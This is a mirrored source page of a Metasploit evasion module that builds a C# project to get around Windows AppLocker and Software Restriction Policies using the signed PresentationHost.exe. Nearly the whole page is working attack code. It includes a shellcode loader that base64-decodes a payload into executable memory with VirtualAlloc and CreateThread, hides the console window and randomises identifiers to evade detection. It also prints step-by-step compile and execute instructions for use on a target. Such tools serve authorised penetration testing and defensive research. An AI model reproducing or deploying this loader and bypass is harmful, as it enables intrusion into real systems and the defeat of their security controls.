CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/evasion/windows/applocker_evasion_presentationhost.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Evasion

7


8
  def initialize(info = {})

9
    super(update_info(info,

10
      'Name'        => 'Applocker Evasion - Windows Presentation Foundation Host',

11
      'Description' => %(

12
         This module will assist you in evading Microsoft

13
         Windows Applocker and Software Restriction Policies.

14
         This technique utilises the Microsoft signed binary

15
         PresentationHost.exe to execute user supplied code.

16
                        ),

17
      'Author'      =>

18
        [

19
          'Nick Tyrer <@NickTyrer>', # module development

20
          'Casey Smith' # presentationhost bypass research

21
        ],

22
      'License'     => 'MSF_LICENSE',

23
      'Platform'    => 'win',

24
      'Arch'        => [ARCH_X86],

25
      'Targets'     => [['Microsoft Windows', {}]])

26
    )

27


28
    register_options(

29
      [

30
        OptString.new('CS_FILE', [true, 'Filename for the .xaml.cs file (default: presentationhost.xaml.cs)', 'presentationhost.xaml.cs']),

31
        OptString.new('MANIFEST_FILE', [true, 'Filename for the .manifest file (default: presentationhost.manifest)', 'presentationhost.manifest']),

32
        OptString.new('CSPROJ_FILE', [true, 'Filename for the .csproj file (default: presentationhost.csproj)', 'presentationhost.csproj'])

33
      ]

34
    )

35


36
    deregister_options('FILENAME')

37
  end

38


39
  def build_payload

40
    Rex::Text.encode_base64(payload.encoded)

41
  end

42


43
  def obfu

44
    Rex::Text.rand_text_alpha 8

45
  end

46


47
  def presentationhost_xaml_cs

48
    esc = build_payload

49
    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]

50
    <<~HEREDOC

51
      using System;

52
      class #{mod[0]}{

53
      static void Main(string[] args){

54
      IntPtr #{mod[1]};

55
      #{mod[1]} = GetConsoleWindow();

56
      ShowWindow(#{mod[1]}, #{mod[2]});

57
      string #{mod[3]} = "#{esc}";

58
      byte[] #{mod[4]} = Convert.FromBase64String(#{mod[3]});

59
      byte[] #{mod[5]} = #{mod[4]};

60
      IntPtr #{mod[6]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[5]}.Length, #{mod[7]}, #{mod[8]});

61
      System.Runtime.InteropServices.Marshal.Copy(#{mod[5]}, 0, #{mod[6]}, #{mod[5]}.Length);

62
      IntPtr #{mod[9]} = IntPtr.Zero;

63
      WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[6]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[10]});}

64
      private static Int32 #{mod[7]}=0x1000;

65
      private static IntPtr #{mod[8]}=(IntPtr)0x40;

66
      private static UInt32 #{mod[10]} = 0xFFFFFFFF;

67
      [System.Runtime.InteropServices.DllImport("kernel32")]

68
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

69
      [System.Runtime.InteropServices.DllImport("kernel32")]

70
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

71
      [System.Runtime.InteropServices.DllImport("kernel32")]

72
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

73
      [System.Runtime.InteropServices.DllImport("user32.dll")]

74
      static extern bool ShowWindow(IntPtr #{mod[1]}, int nCmdShow);

75
      [System.Runtime.InteropServices.DllImport("Kernel32")]

76
      private static extern IntPtr GetConsoleWindow();

77
      const int #{mod[2]} = 0;}

78
    HEREDOC

79
  end

80


81
  def presentationhost_manifest

82
    <<~HEREDOC

83
      <?xml version="1.0" encoding="utf-8"?>

84
      <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">

85
      <assemblyIdentity version="1.0.0.0" name="MyApplication.app" />

86
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">

87
      <security>

88
      <applicationRequestMinimum>

89
      <defaultAssemblyRequest permissionSetReference="Custom" />

90
      <PermissionSet class="System.Security.PermissionSet" version="1" ID="Custom" SameSite="site" Unrestricted="true" />

91
      </applicationRequestMinimum>

92
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">

93
      <requestedExecutionLevel level="asInvoker" uiAccess="false" />

94
      </requestedPrivileges>

95
      </security>

96
      </trustInfo>

97
      </assembly>

98
    HEREDOC

99
  end

100


101
  def presentationhost_csproj

102
    <<~HEREDOC

103
      <?xml version="1.0" encoding="utf-8"?>

104
      <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

105
      <Import Project="$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props')" />

106
      <PropertyGroup>

107
      <Configuration Condition=" '$(Configuration)' == '' ">Release</Configuration>

108
      <Platform Condition=" '$(Platform)' == '' ">x86</Platform>

109
      <OutputType>WinExe</OutputType>

110
      <HostInBrowser>true</HostInBrowser>

111
      <GenerateManifests>true</GenerateManifests>

112
      <SignManifests>false</SignManifests>

113
      </PropertyGroup>

114
      <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">

115
      <Optimize>true</Optimize>

116
      <OutputPath>.</OutputPath>

117
      </PropertyGroup>

118
      <ItemGroup>

119
      <Reference Include="System" />

120
      </ItemGroup>

121
      <ItemGroup>

122
      <Compile Include="#{datastore['CS_FILE']}">

123
      <DependentUpon>#{datastore['CS_FILE']}</DependentUpon>

124
      <SubType>Code</SubType>

125
      </Compile>

126
      </ItemGroup>

127
      <ItemGroup>

128
      <None Include="#{datastore['MANIFEST_FILE']}" />

129
      </ItemGroup>

130
      <Import Project="$(MSBuildToolsPath)\\Microsoft.CSharp.targets" />

131
      </Project>

132
    HEREDOC

133
  end

134


135
  def file_format_filename(name = '')

136
    name.empty? ? @fname : @fname = name

137
  end

138


139
  def create_files

140
    f1 = datastore['CS_FILE'].empty? ? 'presentationhost.xaml.cs' : datastore['CS_FILE']

141
    f1 << '.xaml.cs' unless f1.downcase.end_with?('.xaml.cs')

142
    f2 = datastore['MANIFEST_FILE'].empty? ? 'presentationhost.manifest' : datastore['MANIFEST_FILE']

143
    f2 << '.manifest' unless f2.downcase.end_with?('.manifest')

144
    f3 = datastore['CSPROJ_FILE'].empty? ? 'presentationhost.csproj' : datastore['CSPROJ_FILE']

145
    f3 << '.csproj' unless f3.downcase.end_with?('.csproj')

146
    cs_file = presentationhost_xaml_cs

147
    manifest_file = presentationhost_manifest

148
    csproj_file = presentationhost_csproj

149
    file_format_filename(f1)

150
    file_create(cs_file)

151
    file_format_filename(f2)

152
    file_create(manifest_file)

153
    file_format_filename(f3)

154
    file_create(csproj_file)

155
  end

156


157
  def instructions

158
    print_status "Copy #{datastore['CS_FILE']}, #{datastore['MANIFEST_FILE']} and #{datastore['CSPROJ_FILE']} to the target"

159
    print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\MSBuild.exe #{datastore['CSPROJ_FILE']}"

160
    print_status "Execute using: C:\\Windows\\System32\\PresentationHost.exe [Full Path To] #{datastore['CS_FILE'].gsub('.xaml.cs', '.xbap')}"

161
  end

162


163
  def run

164
    create_files

165
    instructions

166
  end

167
end

168


169